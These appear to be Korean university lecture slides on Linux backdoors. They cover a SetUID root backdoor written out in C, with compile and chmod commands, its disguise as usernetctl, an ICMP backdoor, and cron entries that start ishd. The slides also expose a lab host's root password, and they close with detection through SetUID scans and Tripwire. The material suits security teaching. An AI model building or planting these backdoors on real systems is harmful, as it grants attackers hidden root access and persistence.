Chapter 6. 리눅스 백도어 황 선 환
목 차 SetUID 형 로컬 백도어 설치 및 이용 ICMP 백도어 Cron 백도어 백도어 탐지 목 차 SetUID 형 로컬 백도어 설치 및 이용 ICMP 백도어 Cron 백도어 백도어 탐지 Tripwire를 이용한 백도어 탐지
리눅스 백도어 리눅스 시스템 접속 bisdn 계정 주소 : bisdn1.kiu.ac.kr Root 계정 ID : root PW : bisdn1 bisdn 계정 ID : bisdn
SetUID 형 로컬 백도어 설치 및 이용 백도어의 생성 #include <stdio.h> #include <stdio.h> main (int argc, char *argv[]){ char exec[100]; setuid (0); setgid (0); sprintf (exec, "%s 2>/dev/null ", argv[1]); system (exec); }
SetUID 형 로컬 백도어 설치 및 이용 백도어의 생성 gcc –o backdoor backdoor.c chmod 4755 backdoor
SetUID 형 로컬 백도어 설치 및 이용 백도어의 동작 Id ./backdoor “id” uid=500(bisdn) gid=500(bisdn) groups=500(bisdn) ./backdoor “id” uid=0(root) gid=0(root) groups=500(bisdn)
SetUID 형 로컬 백도어 설치 및 이용 백도어의 설치 시스템 내부에서 SetUID 비트를 가진 파일 검색
SetUID 형 로컬 백도어 설치 및 이용 백도어의 설치 시스템 내부에서 SetUID 비트를 가진 파일 선택 백도어의 수정 Printf (“usage: usernetctl <interface-config> <up|down|report>\n”);
SetUID 형 로컬 백도어 설치 및 이용 백도어의 설치 백도어와 원래 파일과 바꾸기, 백도어의 사용
리눅스 백도어 데몬에 대한 로그인 시 권한 부여
ICMP 백도어 ICMP 서버와 클라이언트 컴파일 ICMP 백도어 구동
ICMP 백도어 ICMP 클라이언트를 이용한 접속
ICMP 백도어 패킷 분석 tcpdump host bisdn1.kiu.ac.kr
ICMP 백도어 ICMP 패킷 분석 윈도우 2000 Ping 레드헷 9.0 Ping
Cron 백도어 Cron 데몬 이해하기 Cron 데몬은 /etc/crontab의 내용에 따라 주기적으로 프로그램을 실행하거나 중지한다. vi /etc/crontab 02 4 * * * root run-parts /etc/cron daily
Cron 백도어 Cron 데몬 값 범위 Cron 데몬 값 설정(ish 백도어) 0 4 * * * ./ishd –I 65000 0 5 * * * pkill –U root ishd 필드 사용할 수 있는 값 분 0에서 59 시 0에서 23 날짜 0에서 31 달 0에서 12 : 달 이름 사용 가능 요일 0 또는 7 : 일요일, 요일 이름을 사용 가능
백도어 탐지 프로세스 확인 열린 포트 확인
백도어 탐지 SetUID 파일 검사 백도어 탐지 툴의 이용 무결성 검사
백도어 탐지 – Tripwire 설치하기 rpm –q tripwire rpm –Uvh tripwire-2.3.1.-17.i386.rpm /usr/sbin/tripwire
백도어 탐지 – Tripwire Tripwire 초기화 /etc/twinstall.sh
백도어 탐지 – Tripwire Tripwire 설정 cat /etc/tripwire/twcfg.txt
백도어 탐지 – Tripwire Tripwire 설정 cat /etc/tripwire/twpol.txt
/var/lib/tripwire/report Tripwire --check Twprint --m r --twrfile [보고서 파일.twr] 저장 경로 /var/lib/tripwire/report
질의 및 응답. 수고하셨습니다.